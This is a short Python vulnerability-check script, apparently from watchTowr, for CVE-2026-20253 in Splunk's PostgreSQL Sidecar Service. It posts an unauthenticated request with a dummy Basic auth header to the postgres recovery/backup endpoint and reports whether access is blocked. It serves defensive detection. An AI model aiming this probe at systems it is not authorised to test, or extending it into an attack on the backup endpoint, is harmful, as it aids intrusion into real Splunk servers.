import argparse import urllib3 import requests banner = """ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\ \\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/ \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| \\/ \\/ \\/ watchTowr-vs-Splunk-CVE-2026-20253.py (*) CVE-2026-20253 Splunk PostgreSQL Sidecar Service Detection Artifact Generator - Piotr (@chudyPB) of watchTowr (@watchTowrcyber) """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def dag(host, region): url = f"{host}{region}/splunkd/__raw/v1/postgres/recovery/backup" headers = {"Authorization":"Basic ZGFnOg=="} resp = requests.post(url, headers=headers, verify = False) if resp.status_code == 400 and 'Failed to decode' in resp.text: print('[+] VULNERABLE - access to /v1/postgres/recovery/backup not blocked') elif resp.status_code == 401: print('[-] NOT VULNERABLE - access to /v1/postgres/recovery/backup blocked') else: print('[+/-] UNKNOWN MESSAGE - please verify manually. PostgreSQL Sidecar Service may not be installed/enabled') if __name__ == "__main__": print(banner) usage = """python3 poc.py [-h] -H HOST \r\n\r\n\ For more help, use "python3 poc.py --help" INFO HERE """ parser = argparse.ArgumentParser(description = 'CVE-2026-20253 Splunk PostgreSQL Sidecar Service Detection Artifact Generator', usage = usage) #required arg parser.add_argument('-H', dest = 'host', action = "store", type = str, help = 'Host, eg. "http://splunk.lab:8000"', required = True) parser.add_argument('-r', dest = 'region', action = "store", type = str, help = 'Region for your installation, eg. "en-US"', required = True) #get arguments args = parser.parse_args() host = args.host region = args.region if host[-1] != '/': host += '/' dag(host, region)